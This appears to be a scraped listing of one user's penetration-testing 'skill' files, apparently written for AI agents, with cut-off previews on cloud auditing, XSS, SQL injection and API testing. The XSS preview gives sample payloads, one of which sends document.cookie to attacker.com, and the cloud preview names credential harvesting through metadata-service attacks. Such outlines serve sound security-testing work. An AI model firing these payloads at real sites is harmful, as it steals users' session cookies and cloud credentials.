anandbinuarjun

4 verified skills

skills/cloud-security

# Cloud Security Audit Skill --- name: cloud-security-audit description: Auditing AWS/Azure/GCP infrastructure and identities. --- ## Methodology 1. **Misconfiguration Scan**: Use `prowler` or `scout-suite` to find quick wins. 2. **Identity Review**: Audit IAM roles for over-privilege or dangling identities. 3. **Storage Audit**: Verify S3 bucket policies and RDS encryption. 4. **Credential Harvesting**: Perform metadata service attacks (IMDSv1/v2). ## Tools - `prowler` - `scout-suite` - `pacu

tools

skills/xss-testing

# CyberStrikeAI Skill: XSS Vulnerability Testing ## Methodology 1. **Target Identification**: Locate all input fields, URL parameters, and headers that are reflected in the DOM. 2. **Context Analysis**: Determine if the reflection is inside an HTML tag, attribute, or JavaScript block. 3. **Payload Generation**: - Basic: `<script>alert(1)</script>` - Bypassing: `<img src=x onerror=alert(1)>` - Data Exfiltration: `<script>fetch('http://attacker.com/log?c='+document.cookie)</script>` 4.

development

SQL Injection Testing

Methods and tools for discovering and exploiting SQL injection vulnerabilities

tools

skills/api-security

# API Security Testing Skill --- name: api-security-testing description: Specialized auditing for REST, GraphQL, and gRPC endpoints. --- ## Methodology 1. **Schema Discovery**: Extract API endpoints using `arjun` or `graphql-scanner`. 2. **Logic Check**: Test for BOLA/BFLA (Broken Object/Function Level Authorization). 3. **Mass Assignment**: Identify hidden fields that can be updated via POST/PUT. 4. **Injection**: Fuzz parameters for standard and API-specific injection flaws. ## Tools - `arju

tools

anandbinuarjun

skills/cloud-security

skills/xss-testing

SQL Injection Testing

skills/api-security

Adoption

anandbinuarjun

skills/cloud-security

skills/xss-testing

SQL Injection Testing

skills/api-security